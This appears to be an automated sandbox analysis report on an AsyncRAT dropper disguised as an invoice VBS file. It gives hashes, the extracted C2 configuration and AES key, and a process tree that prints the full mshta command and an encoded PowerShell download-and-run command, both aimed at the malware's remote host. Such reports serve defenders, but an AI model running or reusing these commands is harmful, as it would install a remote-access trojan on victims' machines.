asyncrat | 1c58b7edbf5afeeccdff1eda0694d86572e7e25df35cadba6d1c6cd11b6384bd

General

Target

invoice-ID711675345593.vbs
Size

317B
MD5

730f4edff655d002cbf863543d542c10
SHA1

59f1a7fdd6ff3e0a0191af7f6febaeaba1a4ae44
SHA256

1c58b7edbf5afeeccdff1eda0694d86572e7e25df35cadba6d1c6cd11b6384bd
SHA512

b16eefc3b7a188664ceb4385611305564f02585cb75a1ace40d45d49f22bf2c42686c147e09230f1d04658f5d04cfeec9fef9053604737fe3c7597bff0994441

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://nyanxcat.online/Runpe/test/N1/PS.jpg

Extracted

Family

asyncrat

Version

0.5.7B

C2

saico015.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
9FovObaHt9uwQBnog9MPOAzupINFTyW8
anti_detection
false
autorun
false
bdos
false
delay
Default
host
saico015.linkpc.net
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6666
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3804-9-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/3804-10-0x000000000040C73E-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

12 3928 mshta.exe
13 3640 powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3640 powershell.exe
3640 powershell.exe
3640 powershell.exe

flow	pid	process
12	3928	mshta.exe
13	3640	powershell.exe

pid	process
3640	powershell.exe
3640	powershell.exe
3640	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeIncreaseQuotaPrivilege	3640	powershell.exe
Token: SeSecurityPrivilege	3640	powershell.exe
Token: SeTakeOwnershipPrivilege	3640	powershell.exe
Token: SeLoadDriverPrivilege	3640	powershell.exe
Token: SeSystemProfilePrivilege	3640	powershell.exe
Token: SeSystemtimePrivilege	3640	powershell.exe
Token: SeProfSingleProcessPrivilege	3640	powershell.exe
Token: SeIncBasePriorityPrivilege	3640	powershell.exe
Token: SeCreatePagefilePrivilege	3640	powershell.exe
Token: SeBackupPrivilege	3640	powershell.exe
Token: SeRestorePrivilege	3640	powershell.exe
Token: SeShutdownPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeSystemEnvironmentPrivilege	3640	powershell.exe
Token: SeRemoteShutdownPrivilege	3640	powershell.exe
Token: SeUndockPrivilege	3640	powershell.exe
Token: SeManageVolumePrivilege	3640	powershell.exe
Token: 33	3640	powershell.exe
Token: 34	3640	powershell.exe
Token: 35	3640	powershell.exe
Token: 36	3640	powershell.exe
Token: SeIncreaseQuotaPrivilege	3640	powershell.exe
Token: SeSecurityPrivilege	3640	powershell.exe
Token: SeTakeOwnershipPrivilege	3640	powershell.exe
Token: SeLoadDriverPrivilege	3640	powershell.exe
Token: SeSystemProfilePrivilege	3640	powershell.exe
Token: SeSystemtimePrivilege	3640	powershell.exe
Token: SeProfSingleProcessPrivilege	3640	powershell.exe
Token: SeIncBasePriorityPrivilege	3640	powershell.exe
Token: SeCreatePagefilePrivilege	3640	powershell.exe
Token: SeBackupPrivilege	3640	powershell.exe
Token: SeRestorePrivilege	3640	powershell.exe
Token: SeShutdownPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeSystemEnvironmentPrivilege	3640	powershell.exe
Token: SeRemoteShutdownPrivilege	3640	powershell.exe
Token: SeUndockPrivilege	3640	powershell.exe
Token: SeManageVolumePrivilege	3640	powershell.exe
Token: 33	3640	powershell.exe
Token: 34	3640	powershell.exe
Token: 35	3640	powershell.exe
Token: 36	3640	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WScript.exemshta.exe

description	pid	process	target process
PID 3116 wrote to memory of 3928	3116	WScript.exe	mshta.exe
PID 3116 wrote to memory of 3928	3116	WScript.exe	mshta.exe
PID 3928 wrote to memory of 3640	3928	mshta.exe	powershell.exe
PID 3928 wrote to memory of 3640	3928	mshta.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID711675345593.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://nyanxcat.online/Runpe/test/N1/Clean.txt
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwADoALwAvAG4AeQBhAG4AeABjAGEAdAAuAG8AbgBsAGkAbgBlAC8AUgB1AG4AcABlAC8AdABlAHMAdAAvAE4AMQAvAFAAUwAuAGoAcABnACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:3788

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:3828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:3804

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3640-8-0x0000026A388E0000-0x0000026A388E8000-memory.dmp

Filesize
32KB

Download
memory/3640-3-0x0000000000000000-mapping.dmp

Download
memory/3640-4-0x00007FF81D1E0000-0x00007FF81DBCC000-memory.dmp

Filesize
9.9MB

Download
memory/3640-5-0x0000026A1EEE0000-0x0000026A1EEE1000-memory.dmp

Filesize
4KB

Download
memory/3640-6-0x0000026A38910000-0x0000026A38911000-memory.dmp

Filesize
4KB

Download
memory/3640-7-0x0000026A388D0000-0x0000026A388D7000-memory.dmp

Filesize
28KB

Download
memory/3804-9-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3804-10-0x000000000040C73E-mapping.dmp

Download
memory/3804-11-0x00000000738E0000-0x0000000073FCE000-memory.dmp

Filesize
6.9MB

Download
memory/3804-14-0x00000000058C0000-0x00000000058C1000-memory.dmp

Filesize
4KB

Download
memory/3804-15-0x0000000005E60000-0x0000000005E61000-memory.dmp

Filesize
4KB

Download
memory/3804-16-0x00000000059D0000-0x00000000059D1000-memory.dmp

Filesize
4KB

Download
memory/3928-2-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads